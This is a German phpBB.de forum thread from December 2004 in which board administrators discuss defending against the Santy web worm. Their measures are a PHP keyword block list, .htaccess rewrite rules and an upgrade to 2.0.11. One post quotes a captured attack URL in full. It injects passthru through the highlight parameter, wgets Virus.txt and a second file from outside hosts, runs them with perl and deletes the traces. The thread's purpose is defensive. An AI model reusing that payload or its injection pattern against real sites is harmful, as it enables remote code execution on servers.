Verfasst: 25.12.2004 18:45
von wegen 2.0.11 sei sicher:
http://lists.netsys.com/pipermail/full- ... 30279.html
scheiss script-kiddies
http://lists.netsys.com/pipermail/full- ... 30279.html
scheiss script-kiddies
phpBB.de
phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/
WebWorm generation 4
Seite 7 von 10
Verfasst: 25.12.2004 19:01
man man man wir haben momentan täglich 500-600 angriffe des Wurms. Die sind zwar dank 2.0.11 nicht erfolgreich, aber wenn man andauernd so viele "User" auf dem Board hat und alle in der wietopic.php nervt das schon ein bissel
Verfasst: 26.12.2004 00:46
hier ne Lösung:BraveEagle hat geschrieben:man man man wir haben momentan täglich 500-600 angriffe des Wurms. Die sind zwar dank 2.0.11 nicht erfolgreich, aber wenn man andauernd so viele "User" auf dem Board hat und alle in der wietopic.php nervt das schon ein bissel
z.b. in common.php z.B. folgendes eintragen:
Code: Alles auswählen
if (getenv("QUERY_STRING"))
{
$url_check .= "?".getenv("QUERY_STRING");
}
if ( substr_count($url_check, "h4ck3rsbr.net") > 0
|| substr_count($url_check, "v10.com") > 0
|| substr_count($url_check, "var/tmp") > 0
|| substr_count($url_check, "virus.txt") > 0
|| substr_count($url_check, "wget") > 0
|| substr_count($url_check, "perl") > 0
|| substr_count($url_check, ".txt") > 0
|| substr_count($url_check, "system") > 0
)
{
exit;
}
Die versuchten Angriffe (Bsp.: http://www.XXX.De/viewtopic.php?t=1329&rush=echo _START_; cd /var/tmp;wget www.h4ck3rsbr.net/Virus.txt;perl Virus.txt;wget locais.v10.com.br/w;perl w;rm -rf w*;rm -rf Virus*; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 usw.) werden dann einfach per exit Befehl "abgewehrt".
nachteil: alle verwendten Begriffe können dann z.b. bei der Suche Funktion nicht mehr verwendet werden, aber das sollte temporär ne Lösung anbieten...
Verfasst: 26.12.2004 16:18
hallo,
abgesehen von 2.0.11 = muß, die frage, wo in common.php man das einsetzen könnte und ob in jeder version das funktionieren würde ?
klingt irgendwie zu einfach, aber was spricht denn dagegen ?
für alle kleinen versionen wäre es ein besserer schutz als gar keiner.
viele grüße, yks
abgesehen von 2.0.11 = muß, die frage, wo in common.php man das einsetzen könnte und ob in jeder version das funktionieren würde ?
klingt irgendwie zu einfach, aber was spricht denn dagegen ?
für alle kleinen versionen wäre es ein besserer schutz als gar keiner.
viele grüße, yks
Verfasst: 26.12.2004 16:30
noch einmal:
1) als schutz vor dem santy wurm sollte man bei älteren boards umgehend http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 anwenden - damit (und nur damit!) ist das zugrundeliegende problem behoben und das board ist vor dem grassierenden santy wurm geschützt. aufgrund einiger anderer sicherheitslücken ist eine aktualisierung auf 2.0.11 nichtsdestotrotz dringend zu empfehlen.
2) als schutz vor dem traffic/ressourcenverbrauch aufgrund von anfragen infizierter server kann man folgende .htaccess verwenden: http://www.phpbb.de/viewtopic.php?p=414585#414585
1) als schutz vor dem santy wurm sollte man bei älteren boards umgehend http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 anwenden - damit (und nur damit!) ist das zugrundeliegende problem behoben und das board ist vor dem grassierenden santy wurm geschützt. aufgrund einiger anderer sicherheitslücken ist eine aktualisierung auf 2.0.11 nichtsdestotrotz dringend zu empfehlen.
2) als schutz vor dem traffic/ressourcenverbrauch aufgrund von anfragen infizierter server kann man folgende .htaccess verwenden: http://www.phpbb.de/viewtopic.php?p=414585#414585
Verfasst: 26.12.2004 16:35
@yks
die stelle (und version) ist eigentlich egal, da die Abfragen unabhängig von anderem Zeugs sind, aber am besten ist natürlich so weit oben wie möglich.
>> klar ist ein update auf die aktuelle Version zu empfehlen, aber sollte eine neue Sicherheitslücke auftreten, kann das obige Script ohne Anpassung bestimmte Angriffe abwehren...
außer es wird die post methode verwendet, d.h. mit forumlaren, da könnte man dann folgendes verwenden:
aber bisher sind solche scripts ja nich so häufig (??)
die stelle (und version) ist eigentlich egal, da die Abfragen unabhängig von anderem Zeugs sind, aber am besten ist natürlich so weit oben wie möglich.
>> klar ist ein update auf die aktuelle Version zu empfehlen, aber sollte eine neue Sicherheitslücke auftreten, kann das obige Script ohne Anpassung bestimmte Angriffe abwehren...
außer es wird die post methode verwendet, d.h. mit forumlaren, da könnte man dann folgendes verwenden:
Code: Alles auswählen
while (list($key, $value) = each($HTTP_POST_VARS))
{
$value = htmlspecialchars(trim(stripslashes($value)));
if ( substr_count($key, "XXX") > 0
{ exit; }
}Verfasst: 26.12.2004 16:40
ins rootverzeichnis des Forums eine .htaccess legen:
Code: Alles auswählen
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
Verfasst: 26.12.2004 16:42
welchen effekt / welche wirkung hat das ding dann??
Verfasst: 26.12.2004 16:49
das sorgt dafuer, dass Anfragen mit der typischen Signatur des Wurms im Nirvana enden, aber keinen Zugriff aufs Forum bekommen 
Verfasst: 30.12.2004 14:57
Obige htaccess kann aber auch dazu führen, dass mehr Anfragen im Nirvana landen. Zum Beispiel wenn man alle Foren als gelesen markiert und nach einer Weile die Ansicht aktualisiert...